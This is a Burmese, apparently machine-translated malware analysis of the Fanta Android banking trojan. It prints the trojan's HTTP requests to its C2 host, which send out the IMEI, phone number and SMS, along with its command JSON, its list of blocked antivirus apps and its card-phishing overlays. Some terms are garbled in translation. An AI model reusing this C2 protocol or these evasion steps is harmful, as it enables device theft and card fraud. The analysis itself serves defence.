ထိန်းချုပ်ဆာဗာနှင့် ကွန်ရက် အပြန်အလှန်ဆက်သွယ်မှုသည် HTTP ပရိုတိုကောမှတစ်ဆင့် ဖြစ်ပွားသည်။ Fanta သည် ကွန်ရက်နှင့် အလုပ်လုပ်ရန် နာမည်ကြီး Retrofit စာကြည့်တိုက်ကို အသုံးပြုသည်။ တောင်းဆိုချက်များကို ပေးပို့သည်။ hXXp://onuseseddohap[.]club/controller.php. ဆာဗာပေါ်တွင် စာရင်းသွင်းသောအခါတွင် ဆာဗာလိပ်စာကို ပြောင်းလဲနိုင်သည်။ ကွတ်ကီးကို ဆာဗာမှ ပြန်ပေးနိုင်သည်။ Fanta သည် ဆာဗာသို့ အောက်ပါတောင်းဆိုမှုများ ပြုလုပ်သည်-

• ထိန်းချုပ်ဆာဗာတွင် Bot မှတ်ပုံတင်ခြင်းသည် ပထမဆုံးစတင်ချိန်တွင် တစ်ကြိမ်ဖြစ်သည်။ ကူးစက်ခံထားရသော စက်နှင့်ပတ်သက်သည့် အောက်ပါဒေတာများကို ဆာဗာသို့ ပေးပို့သည်-
  · cookie - ဆာဗာမှ လက်ခံရရှိထားသော ကွတ်ကီးများ (မူလတန်ဖိုးသည် ဗလာစာကြောင်းတစ်ခု)
  · mode ကို - string အဆက်မပြတ် register_bot
  · ရှေ့ဆက် - ကိန်းသေကိန်းသေ 2
  · ဗားရှင်း_sdk - အောက်ပါ ပုံစံအတိုင်း ဖွဲ့စည်းထားပါသည်။ <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
  · IMEI - ကူးစက်ခံထားရသောစက်ပစ္စည်း၏ IMEI
  · ပြည် — ISO ဖော်မတ်ဖြင့် အော်ပရေတာမှတ်ပုံတင်ထားသည့် နိုင်ငံ၏ကုဒ်
  · ဂဏန်း - ဖုန်းနံပါတ်
  · အော်ပရေတာ - အော်ပရေတာအမည်

  ဆာဗာသို့ ပေးပို့ထားသော တောင်းဆိုချက်၏ ဥပမာတစ်ခု။

  POST /controller.php HTTP/1.1
  Cookie:
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 144
  Host: onuseseddohap.club
  Connection: close
  Accept-Encoding: gzip, deflate
  User-Agent: okhttp/3.6.0
  
  mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
  

  တောင်းဆိုချက်ကို တုံ့ပြန်ရာတွင်၊ ဆာဗာသည် အောက်ပါ ကန့်သတ်ချက်များပါရှိသော JSON အရာဝတ္ထုကို ပြန်ပေးသင့်သည်-
  bot_id - ကူးစက်ခံထားရသောကိရိယာ၏သတ်မှတ်မှု။ bot_id သည် 0 နှင့် ညီမျှပါက Fanta သည် တောင်းဆိုချက်ကို ပြန်လည်လုပ်ဆောင်ပါမည်။
  bot_pwd - ဆာဗာအတွက် စကားဝှက်။
  ဆာဗာ - ထိန်းချုပ်မှုဆာဗာ၏လိပ်စာ။ ရွေးချယ်နိုင်သော ကန့်သတ်ချက်။ ကန့်သတ်ဘောင်ကို မသတ်မှတ်ပါက၊ အပလီကေးရှင်းတွင် သိမ်းဆည်းထားသော လိပ်စာကို အသုံးပြုပါမည်။

  JSON အရာဝတ္ထု ဥပမာ-

  {
      "response":[
     	 {
     		 "bot_id": <%BOT_ID%>,
     		 "bot_pwd": <%BOT_PWD%>,
     		 "server": <%SERVER%>
     	 }
      ],
      "status":"ok"
  }

• ဆာဗာမှ အမိန့်တစ်ခု လက်ခံရယူရန် တောင်းဆိုခြင်း။ အောက်ပါဒေတာကို ဆာဗာသို့ ပို့သည်-
  · cookie - ဆာဗာမှ ရရှိထားသော ကွတ်ကီးများ
  · လေလံ — တောင်းဆိုချက်ပေးပို့သည့်အခါ လက်ခံရရှိထားသော ကူးစက်ခံထားရသော စက်ပစ္စည်း၏ ID register_bot
  · ရသ - ဆာဗာအတွက် စကားဝှက်
  · divice_admin - စီမံခန့်ခွဲသူအခွင့်အရေးများ ရရှိခြင်းရှိမရှိကို နယ်ပယ်မှ ဆုံးဖြတ်သည်။ စီမံခန့်ခွဲသူအခွင့်အရေးများရရှိပါက အကွက်သည် ညီမျှသည်။ 1မဟုတ်ရင် 0
  · Accessibility - Accessibility Service ၏ အခြေအနေ။ ဝန်ဆောင်မှုကို စတင်ခဲ့လျှင် တန်ဖိုးဖြစ်သည်။ 1မဟုတ်ရင် 0
  · SMSManager - ထရိုဂျန်ကို SMS လက်ခံရရှိခြင်းအတွက် မူရင်းအပလီကေးရှင်းအဖြစ် ထရိုဂျန်ကို ဖွင့်ထားခြင်းရှိမရှိ ပြသသည်။
  · ဖန်သားပြင် — မျက်နှာပြင်တွင် မည်သည့်အခြေအနေရှိကြောင်း ပြသသည်။ တန်ဖိုးသတ်မှတ်ပါမည်။ 1မျက်နှာပြင်ပွင့်နေပါက၊ သို့မဟုတ်ပါက 0;

  ဆာဗာသို့ ပေးပို့ထားသော တောင်းဆိုချက်၏ ဥပမာတစ်ခု။

  POST /controller.php HTTP/1.1
  Cookie:
  Content-Type: application/x-www-form-urlencoded
  Host: onuseseddohap.club
  Connection: close
  Accept-Encoding: gzip, deflate
  User-Agent: okhttp/3.6.0
  
  mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

  အမိန့်ပေးမှုအပေါ် မူတည်၍ ဆာဗာသည် မတူညီသော ကန့်သတ်ချက်များဖြင့် JSON အရာတစ်ခုကို ပြန်ပေးနိုင်ပါသည်။

  · အဖွဲ့ SMS မက်ဆေ့ခ်ျပို့ပါ။: ကန့်သတ်ချက်များတွင် ဖုန်းနံပါတ်၊ SMS မက်ဆေ့ချ်၏ စာသားနှင့် ပေးပို့ရမည့် မက်ဆေ့ချ်၏ သတ်မှတ်ပုံတို့ ပါဝင်သည်။ အမျိုးအစားဖြင့် ဆာဗာသို့ မက်ဆေ့ချ်ပေးပို့သည့်အခါ identifier ကို အသုံးပြုသည်။ setSms အဆင့်အတန်း.

  {
      "response":
      [
     	 {
     		 "mode": 0,
     		 "sms_number": <%SMS_NUMBER%>,
     		 "sms_text": <%SMS_TEXT%>,
     		 "sms_id": %SMS_ID%
     	 }
      ],
      "status":"ok"
  }

  · အဖွဲ့ ဖုန်းခေါ်ဆိုမှု သို့မဟုတ် USSD အမိန့်ကို ပြုလုပ်ပါ။: တုံ့ပြန်မှု၏ကိုယ်ထည်တွင် ဖုန်းနံပါတ် သို့မဟုတ် အမိန့်ပေးသည်။

  {
      "response":
      [
     	 {
     		 "mode": 1,
     		 "command": <%TEL_NUMBER%>
     	 }
      ],
      "status":"ok"
  }

  · အဖွဲ့ ကြားကာလ parameter ကိုပြောင်းပါ။.

  {
      "response":
      [
     	 {
     		 "mode": 2,
     		 "interval": <%SECONDS%>
     	 }
      ],
      "status":"ok"
  }

  · အဖွဲ့ ကြားဖြတ်ပါရာမီတာကို ပြောင်းပါ။.

  {
      "response":
      [
     	 {
     		 "mode": 3,
     		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
     	 }
      ],
      "status":"ok"
  }

  · အဖွဲ့ SmsManager အကွက်ကို ပြောင်းပါ။.

  {
      "response":
      [
     	 {
     		 "mode": 6,
     		 "enable": 0/1
     	 }
      ],
      "status":"ok"
  }

  · အဖွဲ့ ကူးစက်ခံထားရသော စက်မှ SMS စာတိုများကို စုဆောင်းပါ။.

  {
      "response":
      [
     	 {
     		 "mode": 9
     	 }
      ],
      "status":"ok"
  }

  · အဖွဲ့ ဖုန်းကို စက်ရုံဆက်တင်များသို့ ပြန်လည်သတ်မှတ်ပါ။:

  {
      "response":
      [
     	 {
     		 "mode": 11
     	 }
      ],
      "status":"ok"
  }

  · အဖွဲ့ ReadDialog ဆက်တင်ကို ပြောင်းပါ။.

  {
      "response":
      [
     	 {
     		 "mode": 12,
     		 "enable": 0/1
     	 }
      ],
      "status":"ok"
  }

• အမျိုးအစားဖြင့် စာတိုပေးပို့ခြင်း။ setSms အဆင့်အတန်း. အမိန့်ကို အကောင်အထည်ဖော်ပြီးနောက် ဤတောင်းဆိုမှုကို ပြုလုပ်သည်။ SMS မက်ဆေ့ခ်ျပို့ပါ။. တောင်းဆိုချက်သည် ဤကဲ့သို့ဖြစ်သည်-

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

• ဒေတာဘေ့စ်၏အကြောင်းအရာများကိုတင်ပြခြင်း။ တောင်းဆိုမှုတစ်ခုလျှင် စာကြောင်းတစ်ကြောင်း လွှဲပြောင်းသည်။ အောက်ပါဒေတာကို ဆာဗာသို့ ပို့သည်-
  · cookie - ဆာဗာမှ ရရှိထားသော ကွတ်ကီးများ
  · mode ကို - string အဆက်မပြတ် SetSaveInboxSms
  · လေလံ — တောင်းဆိုချက်ပေးပို့သည့်အခါ လက်ခံရရှိထားသော ကူးစက်ခံထားရသော စက်ပစ္စည်း၏ ID register_bot
  · စာသားမ - လက်ရှိဒေတာဘေ့စ်မှတ်တမ်း (အကွက် d စားပွဲမှ မှတ်တမ်းများ အဆိုပါဒေတာဘေ့စ၌တည်၏ а)
  · ဂဏန်း - လက်ရှိဒေတာဘေ့စ်မှတ်တမ်း (အကွက် p စားပွဲမှ မှတ်တမ်းများ အဆိုပါဒေတာဘေ့စ၌တည်၏ а)
  · sms_မုဒ် - ကိန်းပြည့်တန်ဖိုး (အကွက် m စားပွဲမှ မှတ်တမ်းများ အဆိုပါဒေတာဘေ့စ၌တည်၏ а)

  တောင်းဆိုချက်သည် ဤကဲ့သို့ဖြစ်သည်-

  POST /controller.php HTTP/1.1
  Cookie:
  Content-Type: application/x-www-form-urlencoded
  Host: onuseseddohap.club
  Connection: close
  Accept-Encoding: gzip, deflate
  User-Agent: okhttp/3.6.0
  
  mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

  ဆာဗာသို့ အောင်မြင်စွာ ပေးပို့ပြီးပါက အတန်းအား ဇယားမှ ဖယ်ရှားပါမည်။ ဆာဗာမှ ပြန်ပေးသော JSON အရာဝတ္ထု၏ ဥပမာ-

  {
      "response":[],
      "status":"ok"
  }

AccessibilityService နှင့် အပြန်အလှန်တုံ့ပြန်မှု

မသန်စွမ်းသူများ Android စက်ပစ္စည်းများကို အသုံးပြုရန် ပိုမိုလွယ်ကူစေရန် AccessibilityService ကို အကောင်အထည်ဖော်ခဲ့သည်။ ကိစ္စအများစုတွင်၊ အက်ပလီကေးရှင်းတစ်ခုနှင့်အပြန်အလှန်တုံ့ပြန်ရန်အတွက် ရုပ်ပိုင်းဆိုင်ရာအပြန်အလှန်ဆက်သွယ်မှု လိုအပ်သည်။ AccessibilityService သည် ၎င်းတို့အား ပရိုဂရမ်ဖြင့် ပြုလုပ်ရန် ခွင့်ပြုသည်။ Fanta သည် ဘဏ်လုပ်ငန်းအပလီကေးရှင်းများတွင် ပြတင်းပေါက်အတုများဖန်တီးရန်နှင့် စနစ်ဆက်တင်များနှင့် အချို့သောအက်ပ်လီကေးရှင်းများဖွင့်ခြင်းမှကာကွယ်ရန် ဝန်ဆောင်မှုကိုအသုံးပြုသည်။

AccessibilityService ၏ လုပ်ဆောင်နိုင်စွမ်းကို အသုံးပြု၍ Trojan သည် ကူးစက်ခံထားရသော စက်ပစ္စည်း၏ မျက်နှာပြင်ရှိ အစိတ်အပိုင်းများသို့ ပြောင်းလဲမှုများကို စောင့်ကြည့်သည်။ ယခင်က ဖော်ပြခဲ့သည့်အတိုင်း၊ Fanta ဆက်တင်များတွင် ဒိုင်ယာလော့ဂ်ဘောက်စ်များဖြင့် မှတ်တမ်းရေးခြင်းလုပ်ဆောင်ခြင်းအတွက် တာဝန်ရှိသော ကန့်သတ်ဘောင်တစ်ခု ပါရှိသည်။ readDialog. ဤရွေးချယ်မှုကို သတ်မှတ်ပါက၊ ဖြစ်ရပ်ကို စတင်ခဲ့သည့် ပက်ကေ့ခ်ျ၏ အမည်နှင့် ဖော်ပြချက်အကြောင်း အချက်အလက်ကို ဒေတာဘေ့စ်သို့ ပေါင်းထည့်မည်ဖြစ်သည်။ အစပျိုးသောအခါတွင် Trojan သည် အောက်ပါလုပ်ဆောင်ချက်များကို လုပ်ဆောင်သည်-

• အောက်ပါအခြေအနေမျိုးတွင် ကျောနှင့် အိမ်သော့ခတ်ခြင်းများကို တုပသည်
  · အသုံးပြုသူသည် ၎င်းတို့၏စက်ပစ္စည်းကို ပြန်လည်စတင်လိုပါက
  · အကယ်၍ အသုံးပြုသူသည် “Avito” အပလီကေးရှင်းကို ဖျက်လိုပါက သို့မဟုတ် ဝင်ရောက်ခွင့်အခွင့်အရေးကို ပြောင်းလဲလိုပါက
  · စာမျက်နှာပေါ်တွင် "Avito" လျှောက်လွှာကိုဖော်ပြထားပါက
  · “Google Play Protect” အက်ပ်ကို သင်ဖွင့်သောအခါ
  · AccessibilityService ဆက်တင်များဖြင့် စာမျက်နှာများကို ဖွင့်သည့်အခါ
  · System Security dialog box ပေါ်လာသောအခါ
  · “အခြားအက်ပ်ကိုဆွဲပါ” ဆက်တင်များဖြင့် စာမျက်နှာကိုဖွင့်သည့်အခါ၊
  · စာမျက်နှာကိုဖွင့်သောအခါ “Applications”၊ “Backup and Reset”၊ “Data Reset”၊ “Reset Settings”၊ “Developer Panel”၊ “Spec. အခွင့်အလမ်းများ”၊ “သုံးစွဲနိုင်မှု”၊ “အထူးအခွင့်အရေးများ”
  · အကယ်၍ ဖြစ်ရပ်ကို အချို့သော အပလီကေးရှင်းများက ထုတ်ပေးခဲ့လျှင်၊

  လျှောက်လွှာစာရင်း

  • android ဖုန်း
  • Master Lite
  • စင်ကြယ်သောမာစတာ
  • x86 CPU အတွက် Clean Master
  • Meizu Applicatiom ခွင့်ပြုချက်စီမံခန့်ခွဲမှု
  • MIUI လုံခြုံရေး
  • Clean Master - Antivirus & Cache & Junk Cleaner
  • မိဘထိန်းချုပ်မှုနှင့် GPS- Kaspersky SafeKids
  • Kaspersky Antivirus AppLock & Web Security Beta
  • Virus Cleaner၊ Antivirus၊ Cleaner (MAX Security)
  • မိုဘိုင်း AntiVirus လုံခြုံရေး PRO
  • Avast ဗိုင်းရပ်စ်နှိမ်နှင်းခြင်းနှင့်အခမဲ့ကာကွယ်ခြင်း 2019
  • မိုဘိုင်းလုံခြုံရေး MegaFon
  • Xperia အတွက် AVG ကာကွယ်မှု
  • မိုဘိုင်းလုံခြုံရေး
  • Malwarebytes ဗိုင်းရပ်စ်နှိမ့်ခြင်း
  • Android 2019 အတွက် Antivirus
  • လုံခြုံရေးမာစတာ - Antivirus၊ VPN၊ AppLock၊ Booster
  • တက်ဘလက်အတွက် AVG ဗိုင်းရပ်စ်နှိမ်နင်းရေး Huawei စနစ်မန်နေဂျာ
  • Samsung သုံးစွဲနိုင်မှု
  • Samsung စမတ်မန်နေဂျာ
  • လုံခြုံရေးသခင်
  • မြန်နှုန်း Booster
  • Dr.Web
  • Dr.Web လုံခြုံရေးနေရာ
  • Dr.Web မိုဘိုင်းထိန်းချုပ်ရေးစင်တာ
  • Dr.Web Security Space ဘဝ
  • Dr.Web မိုဘိုင်းထိန်းချုပ်ရေးစင်တာ
  • Antivirus & မိုဘိုင်းလုံခြုံရေး
  • Kaspersky အင်တာနက်လုံခြုံရေး- ဗိုင်းရပ်စ်နှင့် ကာကွယ်ရေး
  • Kaspersky Battery Life- Saver & Booster
  • Kaspersky Endpoint Security - အကာအကွယ်နှင့် စီမံခန့်ခွဲမှု
  • AVG Antivirus အခမဲ့ 2019 - Android အတွက် ကာကွယ်မှု
  • Android Antivirus
  • Norton မိုဘိုင်းလုံခြုံရေးနှင့် Antivirus
  • Antivirus၊ firewall၊ VPN၊ မိုဘိုင်းလုံခြုံရေး
  • မိုဘိုင်းလုံခြုံရေး- Antivirus၊ VPN၊ Anti-သူခိုး
  • Android အတွက် Antivirus

• နံပါတ်တိုတစ်ခုထံ SMS စာတိုပေးပို့သည့်အခါ ခွင့်ပြုချက်တောင်းခံပါက၊ Fanta သည် အမှန်ခြစ်ပုံးပေါ်တွင် ကလစ်နှိပ်ခြင်းကို ပုံစံတူလုပ်သည်။ ရွေးချယ်မှုကို သတိရပါ။ နှင့်ခလုတ် ပို့ပေးရန်.
• Trojan မှ စီမံခန့်ခွဲသူအခွင့်အရေးများကို ဖယ်ရှားရန် သင်ကြိုးစားသောအခါ၊ ၎င်းသည် ဖုန်းစခရင်ကို ပိတ်ဆို့သည်။
• စီမံခန့်ခွဲသူအသစ်များ ထပ်ထည့်ခြင်းမှ တားဆီးသည်။
• Antivirus application တွေရှိရင် dr.web ခြိမ်းခြောက်မှုတစ်ခုကို တွေ့ရှိလိုက်သည်၊ Fanta သည် ခလုတ်တစ်ခုကို နှိပ်လိုက်သည် လျစ်လျူရှု.
• အပလီကေးရှင်းမှ အဖြစ်အပျက်ကို ထုတ်ပေးမည်ဆိုပါက ထရိုဂျန်သည် နောက်ကျောနှင့် ပင်မခလုတ်ကို နှိပ်ခြင်းဖြင့် တုပသည်။ Samsung စက်ပစ္စည်းစောင့်ရှောက်မှု.
• Fanta သည် မတူညီသောအင်တာနက်ဝန်ဆောင်မှု 30 ခန့်၏စာရင်းမှအက်ပလီကေးရှင်းတစ်ခုဖွင့်ပါကဘဏ်ကတ်များအကြောင်းအချက်အလက်များထည့်သွင်းရန်ပုံစံများဖြင့် phishing windows ကိုဖန်တီးပေးသည်။ ၎င်းတို့ထဲတွင် AliExpress၊ Booking၊ Avito၊ Google Play Market Component၊ Pandao၊ Drome Auto စသည်တို့ဖြစ်သည်။
  

  ဖြားယောင်းခြင်းပုံစံများ

  Fanta သည် မည်သည့်အက်ပ်လီကေးရှင်းများကို ရောဂါပိုးကူးစက်ခံထားရသော စက်ပစ္စည်းပေါ်တွင် လုပ်ဆောင်သည်ကို ပိုင်းခြားစိတ်ဖြာသည်။ စိတ်ပါဝင်စားသော အက်ပလီကေးရှင်းတစ်ခုကို ဖွင့်ထားပါက၊ Trojan သည် ဘဏ်ကတ်တစ်ခုအကြောင်း အချက်အလက်ထည့်ရန်အတွက် ပုံစံတစ်ခုဖြစ်သည့် အခြားအရာအားလုံး၏အပေါ်တွင် ဖြားယောင်းသည့်ဝင်းဒိုးကို ပြသပေးမည်ဖြစ်သည်။ အသုံးပြုသူသည် အောက်ပါဒေတာကို ထည့်သွင်းရန် လိုအပ်သည်-

  • ကတ်နံပါတ်
  • ကတ်သက်တမ်းကုန်ဆုံးရက်
  • CVV
  • ကတ်ကိုင်ဆောင်သူ၏အမည် (ဘဏ်အားလုံးအတွက် မဟုတ်ပါ)

  လုပ်ဆောင်နေသည့် အပလီကေးရှင်းပေါ် မူတည်၍ မတူညီသော phishing windows ကို ပြသပါမည်။ အောက်ပါတို့သည် ၎င်းတို့ထဲမှ အချို့၏ ဥပမာများဖြစ်သည်။

  aliexpress:

  
  Avito-

  
  အခြား application များအတွက် Google Play Market၊ Aviasales၊ Pandao၊ Booking၊ Trivago-
  

  တကယ်က ဘယ်လိုလဲ။
  

  ကံကောင်းထောက်မစွာ၊ ဆောင်းပါးအစတွင်ဖော်ပြထားသော SMS မက်ဆေ့ချ်ကိုလက်ခံရရှိသူသည် ဆိုက်ဘာလုံခြုံရေးကျွမ်းကျင်သူတစ်ဦးဖြစ်လာခဲ့သည်။ ထို့ကြောင့်၊ ဒါရိုက်တာမဟုတ်သော အစစ်အမှန်ဗားရှင်းသည် အစောပိုင်းကပြောခဲ့သည့်အရာနှင့် ကွဲပြားသည်- ထိုသူသည် စိတ်ဝင်စားစရာကောင်းသည့် SMS တစ်စောင်ကို လက်ခံရရှိပြီးနောက် ၎င်းအား Group-IB Threat Hunting Intelligence အဖွဲ့သို့ ပေးခဲ့သည်။ တိုက်ခိုက်မှု၏ရလဒ်သည်ဤဆောင်းပါးဖြစ်သည်။ ပျော်ရွှင်ဖွယ်အဆုံးသတ်၊ ဟုတ်တယ်မဟုတ်လား။ သို့သော်၊ ဇာတ်လမ်းအားလုံးသည် ဤမျှလောက် ကောင်းမွန်စွာ ပြီးဆုံးသည်မဟုတ်ပါ၊ ထို့ကြောင့် သင့်အား ငွေအရှုံးပေါ်နေသော ဒါရိုက်တာတစ်ဦး၏ ဖြတ်တောက်ပုံနှင့် မတူစေရန်၊ ကိစ္စအများစုတွင် အောက်ပါရှည်လျားသော စည်းမျဉ်းများကို လိုက်နာရန် လုံလောက်သည်-

  • Google Play မှလွဲ၍ အခြားအရင်းအမြစ်များမှ သင့် Android မိုဘိုင်းစက်ပစ္စည်းအတွက် အက်ပ်များကို မထည့်သွင်းပါနှင့်
  • အပလီကေးရှင်းကိုထည့်သွင်းသောအခါ၊ လျှောက်လွှာမှတောင်းဆိုသောအခွင့်အရေးများကို အထူးဂရုပြုပါ။
  • အပ်လုဒ်လုပ်ထားသောဖိုင်များ၏ extension များကိုအာရုံစိုက်ပါ။
  • Android OS အပ်ဒိတ်များကို ပုံမှန်ထည့်သွင်းပါ။
  • သံသယဖြစ်ဖွယ်အရင်းအမြစ်များကို မလည်ပတ်ပါနှင့် ထိုနေရာမှ ဖိုင်များကို ဒေါင်းလုဒ်မလုပ်ပါနှင့်
  • SMS မက်ဆေ့ချ်များတွင် လက်ခံရရှိသော လင့်ခ်များကို မနှိပ်ပါနှင့်။

source: www.habr.com